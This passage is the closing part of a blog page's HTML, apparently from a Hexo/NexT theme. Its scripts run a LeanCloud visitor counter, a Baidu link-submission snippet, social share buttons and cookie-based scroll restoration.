newcounter.save(null, {
success: function(newcounter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
},
error: function(newcounter, error) {
console.log('Failed to create');
}
});
}
},
error: function(error) {
console.log('Error:' + error.code + " " + error.message);
}
});
}
$(function() {
var Counter = AV.Object.extend("Counter");
if ($('.leancloud_visitors').length == 1) {
addCount(Counter);
} else if ($('.post-title-link').length > 1) {
showTime(Counter);
}
});
</script>
<script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
<link rel="stylesheet" href="/lib/needsharebutton/needsharebutton.css">
<script src="/lib/needsharebutton/needsharebutton.js"></script>
<script>
pbOptions = {};
pbOptions.iconStyle = "box";
pbOptions.boxForm = "horizontal";
pbOptions.position = "bottomCenter";
pbOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
new needShareButton('#needsharebutton-postbottom', pbOptions);
flOptions = {};
flOptions.iconStyle = "box";
flOptions.boxForm = "horizontal";
flOptions.position = "middleRight";
flOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
new needShareButton('#needsharebutton-float', flOptions);
</script>
<script type="text/javascript" src="/js/src/js.cookie.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/scroll-cookie.js?v=5.1.4"></script>
</body>
</html>